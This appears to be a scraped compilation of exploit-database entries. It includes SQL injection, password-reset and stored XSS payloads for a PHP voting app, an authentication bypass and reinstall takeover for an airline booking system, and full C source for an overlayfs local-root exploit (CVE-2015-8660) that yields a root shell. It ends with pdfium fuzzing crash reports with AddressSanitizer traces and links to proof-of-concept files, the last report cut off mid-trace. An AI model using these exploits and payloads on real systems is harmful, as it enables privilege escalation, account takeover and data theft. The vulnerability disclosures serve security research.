b) registeracc.php : In registeracc.php there is no filteration or validation for user supplied data, on parameter  " $_POST['email'] 
line no.26 -> $myEmail = $_POST['email'];
...
...
...
line no 30 -> $sql = mysql_query( "INSERT INTO tbMembers(first_name, last_name, email, password) VALUES ('$myFirstName','$myLastName', '$myEmail', '$newpass')" )
        or die( mysql_error() );

an attacker can inject post parameter email to perform SQL Injecton attack.

# PoC : firstname=WICS&lastname=tester&email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or'&password=password&ConfirmPassword=password&submit=Register+Account

2. Password reset : 
   ---------------
In manage-profile.php page, 
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )

By changing the value of 'member_id' attacker can reset the user details including his password.
steps to reproduce :
1. Login into your account.
2. Navagate to Manage My Profile.

Request will be something like - http://localhost/vote/manage-profile.php?id= somenumber
here the value of id will be id of victim, and value of rest of the post parameter will set by attacker.
# PoC :  firstname=Attacker&lastname=LastNmae&email=Tester%40wics.com&password=adminadmin&ConfirmPassword=adminadmin&update=Update+Profile


3. Persistent Cross site Scripting : In 'registeracc.php' and 'manage-profile.php' page the value of post parameter ' email ' supplied by user is not being     -----------------------------------  validated .this leaves application vulnerable to persistent Cross Site Scripting. 

# PoC :   firstname=WICS&lastname=wics&email=<script>alert(document.location)</script>&password=admin&ConfirmPassword=admin&update=Update+Profile
HireHackking 
Exploit Title : Online Airline Booking System multiple vulnerabilities
Author         : WICS
Date             : 05/1/2016
Software Link  : http://sourceforge.net/projects/oabs/
Affected Version: All
 
 
Overview:
 
 
The Online Airline Booking System is designed to be an all in one solution for an airline wishing to speed up and save money compared to a traditional booking system. It consists simply of a server-side web application combined powerful backend database to provide the user with a highly accessible system
 
 1. Authentication Bypass
 
Vulnerability exist in admin panel authentication mechanism due to use of $_COOKIE['LoggedIn'] , as $_COOKIE variable can be manipulated by user 
so any user can login to admin panel without knowing username password
line no. 2          if(!isset($_COOKIE['LoggedIn'])) die("You are not logged in!");

Just set cookie value LoggedIn=yes in request header and web application will let you login.
like this 
Cookie: LoggedIn=yes

2. Application Reinstallation
 
install.php is the page which can be used for application reinstallation.
open link 
application/install.php

a form will appear, first text field is for new admin username and second field is for new password of web application
proceed with installation and web application will setup with new attacker supplied admin username password
HireHackking 
/*
just another overlayfs exploit, works on kernels before 2015-12-26

# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660

blah@ubuntu:~$ id
uid=1001(blah) gid=1001(blah) groups=1001(blah)
blah@ubuntu:~$ uname -a && cat /etc/issue
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
blah@ubuntu:~$ ./overlayfail
root@ubuntu:~# id
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)

12/2015
by rebel

6354b4e23db225b565d79f226f2e49ec0fe1e19b
*/

#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#include <sys/wait.h>

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    system("rm -rf /tmp/haxhax");
    mkdir("/tmp/haxhax", 0777);
    mkdir("/tmp/haxhax/w", 0777);
    mkdir("/tmp/haxhax/u",0777);
    mkdir("/tmp/haxhax/o",0777);

    if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
	fprintf(stderr,"mount failed..\n");
    }

    chmod("/tmp/haxhax/w/work",0777);
    chdir("/tmp/haxhax/o");
    chmod("bash",04755);
    chdir("/");
    umount("/tmp/haxhax/o");
    return 0;
}

int
main(int argc, char **argv)
{
    int status;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    struct stat s;

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    stat("/tmp/haxhax/u/bash",&s);

    if(s.st_mode == 0x89ed)
        execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);

    fprintf(stderr,"couldn't create suid :(\n");
    return -1;
}
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=612

The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:

--- cut ---
$ ./pdfium_test asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8 
Rendering PDF file asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8.
Non-linearized path...
=================================================================
==22207==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b7edb84 at pc 0x000000d6f064 bp 0x7ffc8b7ed8c0 sp 0x7ffc8b7ed8b8
READ of size 4 at 0x7ffc8b7edb84 thread T0
    #0 0xd6f063 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9
    #1 0xd6ecd2 in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:808:3
    #2 0xd6f6a7 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:902:3
    #3 0xedbc22 in DrawFuncShading(CFX_DIBitmap*, CFX_Matrix*, CPDF_Dictionary*, CPDF_Function**, int, CPDF_ColorSpace*, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:293:15
    #4 0xeda3c0 in CPDF_RenderStatus::DrawShading(CPDF_ShadingPattern*, CFX_Matrix*, FX_RECT&, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:875:7
    #5 0xee45b9 in CPDF_RenderStatus::ProcessShading(CPDF_ShadingObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:954:3
    #6 0xe6700d in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:399:14
    #7 0xe61f6d in CPDF_RenderStatus::RenderSingleObject(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:292:3
    #8 0xe618c1 in CPDF_RenderStatus::RenderObjectList(CPDF_PageObjects const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:269:5
    #9 0xe6bc26 in CPDF_RenderStatus::ProcessForm(CPDF_FormObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:485:3
    #10 0xe6704c in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:402:14
    #11 0xe67f47 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:330:3
    #12 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #13 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #14 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #15 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #16 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #17 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #18 0x4f16e9 in main samples/pdfium_test.cc:608:5

Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
    #0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795

  This frame has 2 object(s):
    [32, 36) 'input' <== Memory access at offset 36 overflows this variable
    [48, 52) 'nresults'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
Shadow bytes around the buggy address:
  0x1000116f5b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x1000116f5b70:[04]f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==22207==ABORTING
--- cut ---

While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.

The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39165.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=622

The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:

--- cut ---
==31710==ERROR: AddressSanitizer: SEGV on unknown address 0x7f53cc100009 (pc 0x0000016fafe2 bp 0x7ffee170d730 sp 0x7ffee170d6b0 T0)
    #0 0x16fafe1 in IsFlagSet v8/src/heap/spaces.h:548:13
    #1 0x16fafe1 in IsEvacuationCandidate v8/src/heap/spaces.h:689
    #2 0x16fafe1 in RecordSlot v8/src/heap/mark-compact-inl.h:62
    #3 0x16fafe1 in VisitPointers v8/src/heap/incremental-marking.cc:320
    #4 0x16fafe1 in v8::internal::StaticMarkingVisitor<v8::internal::IncrementalMarkingMarkingVisitor>::VisitPropertyCell(v8::internal::Map*, v8::internal::HeapObject*) v8/src/heap/objects-visiting-inl.h:341
    #5 0x16ed00a in IterateBody v8/src/heap/objects-visiting.h:355:5
    #6 0x16ed00a in VisitObject v8/src/heap/incremental-marking.cc:732
    #7 0x16ed00a in ProcessMarkingDeque v8/src/heap/incremental-marking.cc:769
    #8 0x16ed00a in v8::internal::IncrementalMarking::Step(long, v8::internal::IncrementalMarking::CompletionAction, v8::internal::IncrementalMarking::ForceMarkingAction, v8::internal::IncrementalMarking::ForceCompletionAction) v8/src/heap/incremental-marking.cc:1098
    #9 0x1836243 in InlineAllocationStep v8/src/heap/spaces.h:2537:7
    #10 0x1836243 in InlineAllocationStep v8/src/heap/spaces.cc:1636
    #11 0x1836243 in v8::internal::NewSpace::EnsureAllocation(int, v8::internal::AllocationAlignment) v8/src/heap/spaces.cc:1597
    #12 0x16028a2 in AllocateRawUnaligned v8/src/heap/spaces-inl.h:456:10
    #13 0x16028a2 in AllocateRaw v8/src/heap/spaces-inl.h:480
    #14 0x16028a2 in v8::internal::Heap::AllocateRaw(int, v8::internal::AllocationSpace, v8::internal::AllocationAlignment) v8/src/heap/heap-inl.h:215
    #15 0x16960d7 in v8::internal::Heap::AllocateFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/heap/heap.cc:2119:35
    #16 0x159a4a2 in v8::internal::Factory::NewFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/factory.cc:79:3
    #17 0x25834ee in __RT_impl_Runtime_AllocateInTargetSpace v8/src/runtime/runtime-internal.cc:246:11
    #18 0x25834ee in v8::internal::Runtime_AllocateInTargetSpace(int, v8::internal::Object**, v8::internal::Isolate*) v8/src/runtime/runtime-internal.cc:236
    #7 0x7f53d03063d7  (<unknown module>)
    #8 0x7f53d040f273  (<unknown module>)
    #9 0x7f53d040ad4d  (<unknown module>)
    #10 0x7f53d0336da3  (<unknown module>)
    #11 0x7f53d031a8e1  (<unknown module>)
    #19 0x158a09f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>) v8/src/execution.cc:98:13
    #20 0x158882d in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:167:10
    #21 0xf6e33e in v8::Script::Run(v8::Local<v8::Context>) v8/src/api.cc:1743:23
    #22 0xebf5cb in FXJS_Execute(v8::Isolate*, IJS_Context*, wchar_t const*, FXJSErr*) third_party/pdfium/fpdfsdk/src/jsapi/fxjs_v8.cpp:384:8
    #23 0xe3cc12 in CJS_Runtime::Execute(IJS_Context*, wchar_t const*, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Runtime.cpp:188:14
    #24 0xf54991 in CJS_Context::RunScript(CFX_WideString const&, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Context.cpp:59:12
    #25 0x553134 in CPDFSDK_InterForm::OnFormat(CPDF_FormField*, int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:1822:24
    #26 0x552b8c in CPDFSDK_Widget::OnFormat(int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:330:10
    #27 0x584be9 in CPDFSDK_BFAnnotHandler::OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:593:31
    #28 0x57e44a in CPDFSDK_AnnotHandlerMgr::Annot_OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:94:5
    #29 0x574f67 in CPDFSDK_PageView::LoadFXAnnots() third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:886:5
    #30 0x573c36 in CPDFSDK_Document::GetPageView(CPDF_Page*, int) third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:420:3
    #31 0x528ec3 in FormHandleToPageView third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:32:20
    #32 0x528ec3 in FORM_OnAfterLoadPage third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:263
    #33 0x4da9c2 in RenderPage(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:346:3
    #34 0x4dd558 in RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
    #35 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
    #36 0x7f553e1c4ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (pdfium_test+0x16fafe1)
==31710==ABORTING
--- cut ---

The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554099. Attached is the PDF file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39164.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=623

The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:

--- cut ---
$ ./pdfium_test asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74 
Rendering PDF file asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74.
Non-linearized path...
=================================================================
==27153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000794c at pc 0x000000cfaaef bp 0x7ffd89a11070 sp 0x7ffd89a11068
READ of size 4 at 0x60700000794c thread T0
    #0 0xcfaaee in CPDF_TextObject::CalcPositionData(float*, float*, float, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17
    #1 0xda18a4 in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1301:3
    #2 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3
    #3 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
    #4 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
    #5 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
    #6 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
    #7 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
    #8 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
    #9 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
    #10 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #11 0x4f16e9 in main samples/pdfium_test.cc:608:5

0x60700000794c is located 4 bytes to the left of 72-byte region [0x607000007950,0x607000007998)
allocated by thread T0 here:
    #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
    #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22
    #2 0xcf6db6 in CPDF_TextObject::SetSegments(CFX_ByteString const*, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:233:18
    #3 0xda150f in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1296:3
    #4 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3
    #5 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
    #6 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
    #7 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
    #8 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
    #9 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
    #10 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
    #11 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
    #12 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #13 0x4f16e9 in main samples/pdfium_test.cc:608:5

SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17 in CPDF_TextObject::CalcPositionData(float*, float*, float, int)
Shadow bytes around the buggy address:
  0x0c0e7fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa[fa]00 00 00 00 00 00
  0x0c0e7fff8f30: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0e7fff8f40: 00 04 fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
  0x0c0e7fff8f50: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c0e7fff8f60: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0e7fff8f70: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==27153==ABORTING
--- cut ---

The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554115. Attached is the PDF file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39163.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=625

The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:

--- cut ---
$ ./pdfium_test asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6 
Rendering PDF file asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6.
Non-linearized path...
=================================================================
==28672==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800000f7b2 at pc 0x000000ed2cac bp 0x7ffea0af5970 sp 0x7ffea0af5968
READ of size 1 at 0x61800000f7b2 thread T0
    #0 0xed2cab in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64
    #1 0xece99e in CPDF_DIBSource::DownSampleScanline(int, unsigned char*, int, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1277:5
    #2 0x115235c in CFX_ImageStretcher::ContinueQuickStretch(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:910:5
    #3 0x1151805 in CFX_ImageStretcher::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:834:12
    #4 0x11831f8 in CFX_ImageTransformer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_transform.cpp:409:7
    #5 0x117a4a1 in CFX_ImageRenderer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_main.cpp:1637:9
    #6 0x10986a2 in CFX_AggDeviceDriver::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/agg/src/fx_agg_driver.cpp:1748:10
    #7 0x11a32f1 in CFX_RenderDevice::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/ge/fx_ge_device.cpp:471:10
    #8 0xe8f1f1 in CPDF_ImageRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:869:12
    #9 0xe673bf in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:299:9
    #10 0xe67eff in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:328:12
    #11 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #12 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #13 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #14 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #15 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #16 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #17 0x4f16e9 in main samples/pdfium_test.cc:608:5

0x61800000f7b2 is located 0 bytes to the right of 818-byte region [0x61800000f480,0x61800000f7b2)
allocated by thread T0 here:
    #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
    #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22
    #2 0xe1c1d6 in CPDF_SyntaxParser::ReadStream(CPDF_Dictionary*, PARSE_CONTEXT*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2444:13
    #3 0xe06543 in CPDF_SyntaxParser::GetObject(CPDF_IndirectObjects*, unsigned int, unsigned int, PARSE_CONTEXT*, int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2171:12
    #4 0xe071a4 in CPDF_Parser::ParseIndirectObjectAt(CPDF_IndirectObjects*, long, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1400:7
    #5 0xe0897f in CPDF_Parser::ParseIndirectObject(CPDF_IndirectObjects*, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1195:12
    #6 0xdd7c93 in CPDF_IndirectObjects::GetIndirectObject(unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:1125:12
    #7 0xddafdf in CPDF_Object::GetDirect() const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:220:10
    #8 0xde4960 in CPDF_Dictionary::GetElementValue(CFX_ByteStringC const&) const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:594:14
    #9 0xd99b9b in CPDF_StreamContentParser::FindResourceObj(CFX_ByteStringC const&, CFX_ByteString const&) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1178:25
    #10 0xd8d60c in CPDF_StreamContentParser::Handle_ExecuteXObject() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:696:36
    #11 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
    #12 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
    #13 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
    #14 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
    #15 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
    #16 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
    #17 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
